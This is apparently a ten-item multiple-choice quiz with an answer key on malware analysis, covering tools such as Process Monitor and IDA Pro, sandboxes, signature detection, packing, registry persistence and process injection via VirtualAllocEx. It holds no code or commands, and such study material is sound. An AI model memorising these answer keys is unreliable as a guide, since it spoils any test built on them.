Question 1: Which of the following tools is primarily used for dynamic analysis of malware?
- A. IDA Pro
- B. Ghidra
- C. Process Monitor
- D. Hex-Rays Decompiler
Answer
Answer: C. Process Monitor
Explanation: Process Monitor is a Windows-based tool that captures real-time file system, registry, and process/thread activity, making it ideal for observing malware behavior during dynamic analysis.
Question 2: What is the main purpose of a sandbox environment in malware analysis?
- A. To decrypt encrypted malware samples
- B. To reverse-engineer malware binary code
- C. To isolate and monitor malware behavior safely
- D. To compile source code of malware
Answer
Answer: C. To isolate and monitor malware behavior safely
Explanation: A sandbox provides a controlled and isolated environment where malware can be executed without risk to the host system, allowing analysts to observe its behavior and impact.
Question 3: Which malware detection technique compares a file’s binary code to known malicious code patterns?
- A. Behavioral detection
- B. Signature-based detection
- C. Heuristic analysis
- D. Anomaly-based detection
Answer
Answer: B. Signature-based detection
Explanation: Signature-based detection identifies malware by matching its code to a database of known malware signatures. It’s fast and efficient but ineffective against zero-day threats or obfuscated code.
Question 4: What is the primary goal of code obfuscation in malware?
- A. To reduce the size of the malware
- B. To improve malware performance
- C. To hide the malware’s true functionality
- D. To exploit system vulnerabilities
Answer
Answer: C. To hide the malware’s true functionality
Explanation: Obfuscation is a technique used by attackers to make malware code more difficult to read or analyze, thereby evading detection and delaying reverse engineering efforts.
Question 5: Which malware type disguises itself as legitimate software to deceive users?
- A. Worm
- B. Trojan horse
- C. Rootkit
- D. Adware
Answer
Answer: B. Trojan horse
Explanation: A Trojan horse appears to be a legitimate application but carries malicious payloads that compromise the system once executed by the user.
Question 6: Which of the following is a key indicator of a packed malware sample?
- A. Presence of clear-text strings
- B. Unusual section names in PE header
- C. Large import table
- D. Absence of suspicious API calls
Answer
Answer: B. Unusual section names in PE header
Explanation: Packed executables often have abnormal or custom section names in the PE (Portable Executable) header, such as .UPX or .packed, which are strong indicators of packing or compression.
Question 7: In reverse engineering malware, what is the role of disassemblers like IDA Pro or Ghidra?
- A. Encrypt the malware code for secure storage
- B. Emulate malware behavior in real-time
- C. Convert binary code into assembly code
- D. Analyze network traffic from malware
Answer
Answer: C. Convert binary code into assembly code
Explanation: Disassemblers translate compiled binary code into human-readable assembly instructions, helping analysts understand the underlying logic and behavior of the malware.
Question 8: What is a common sign of malware persistence on a Windows system?
- A. Malware deletes itself after execution
- B. Registry key entries in Run or RunOnce paths
- C. Use of standard system calls only
- D. No change to system boot sequence
Answer
Answer: B. Registry key entries in Run or RunOnce paths
Explanation: Malware often modifies registry keys such as Run or RunOnce to automatically execute itself upon system startup, maintaining persistence across reboots.
Question 9: Which of the following is a primary limitation of static malware analysis?
- A. Requires an internet connection
- B. Cannot analyze the network behavior of malware
- C. Detects only macro-based malware
- D. Cannot be performed on compiled binaries
Answer
Answer: B. Cannot analyze the network behavior of malware
Explanation: Static analysis examines malware code without execution, so it cannot reveal runtime behaviors such as communication with command-and-control servers or dynamic file creation.
Question 10: Which Windows API function is commonly used by malware for process injection?
- A. CreateProcess()
- B. VirtualAllocEx()
- C. GetProcAddress()
- D. MessageBox()
Answer
Answer: B. VirtualAllocEx()
Explanation: VirtualAllocEx() is used to allocate memory in another process’s address space, a critical step in process injection techniques like DLL injection or code injection used by malware.